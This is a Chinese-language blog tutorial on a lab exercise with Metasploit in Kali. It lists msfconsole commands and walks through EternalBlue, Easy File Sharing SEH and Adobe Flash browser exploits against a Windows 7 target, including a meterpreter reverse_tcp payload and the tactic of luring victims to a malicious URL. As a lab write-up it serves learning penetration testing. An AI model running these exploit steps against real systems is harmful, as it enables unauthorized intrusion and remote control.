kali使用Metasploit进行渗透攻击实验

Metasploit

Metasploit是一款开源的安全漏洞检测工具

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。

Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。


一、Metasploit的基础

1.启动 

在kali命令窗口打出msfconsole命令即可启动Metasploit


Metasploit v6.3.4-dev表示版本

2294 exploits表示漏洞渗透模块数量
1201 auxiliary表示辅助模块数量
409 post表示后渗透攻击模块数量
968 payloads表示攻击荷载模块数量
45 encoders表示编码工具模块数量
11 nops表示空指令模块数量

2. Metasploit的常用命令

(1)show 显示

(2)search 搜索

(3)use 使用

(4)set 设置

(5)back 退回

(6)help 帮助

(7)run 启动

(8)exit 退出

3、Metasploit的常用模块

(1)exploit(漏洞渗透模块)

(2)payload(攻击载荷模块)

(3)auxiliary(辅助模块)

(4)post(后渗透攻击模块)

4、命令几个种类

(1)核心命令core command

(2)模块命令module command

(3)任务命令job command

(4)资源命令resource script command

(5)数据库后台命令database backed command

(6)登录凭证后台命令credentials backed command

二、使用Metasploit对操作系统发起攻击 

实验环境:

Kali 2主机IP:192.168.152.128
靶机(64位windows 7,永恒之蓝靶机)IP:192.168.152.129 

1、使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。

 (1)启动metasploit         

        msfconsole
(2)搜索smb_ms17_010检测脚本

        search smb_ms17_010
(3) 对目标主机进行扫描   

        set rhost 192.168.152.129

        run

反馈的结果是靶机上有ms17_010漏洞

2、搜索ms17_010_eternalblue渗透模块,设置需要的参数,启动模块。


3、控制目标主机,查看靶机根目录

        shell

        dir

 三、使用Metasploit对软件发起攻击

实验环境:

Kali 2主机:192.168.152.128
靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)IP:192.168.152.129  

1、查找与EasyFileSharing有关的渗透模块,载入easyfilesharing_seh渗透模块

(1)启动Metarsploit
(2)查找与EasyFileSharing有关的渗透模块
        search EasyFileSharing

2、在目标靶机启动Easy File Sharing

3、设置需要的参数,启动模块

4、到kali中查看,会话成功建立了

四、使用Metasploit对客户端发起攻击

前面介绍的两种攻击都是主动攻击方式,除此以外,metasploit中还提供了大量的被动攻击方式。被动攻击方式需要得到受害者的配合才能成功,但是在日常生活中,这种攻击方式的成功率往往比主动攻击要高。

被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。

实验环境:

Kali 2主机IP:192.168.152.128

靶机(32位Windows 7,安装了Adobe Flash Player插件):192.168.152.129

1、查找与Adobe Flash Player有关的渗透模块

(1)启动Metarsploit

(2)查找与Adobe Flash Player有关的渗透模块

        search Adobe Flash Player

2、载入exploit/multi/browser/adobe_flash_hacking_team_uaf渗透模块,查看需要设置的参数并进行设置,启动模块。

(1)载入渗透模块

        use exploit/multi/browser/adobe_flash_hacking_team_uaf

(2)查看需要设置的参数,启动模块

        show options    

        set payload windows/meterpreter/reverse_tcp

        set lhost 192.168.152.129

        run

  • 7
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值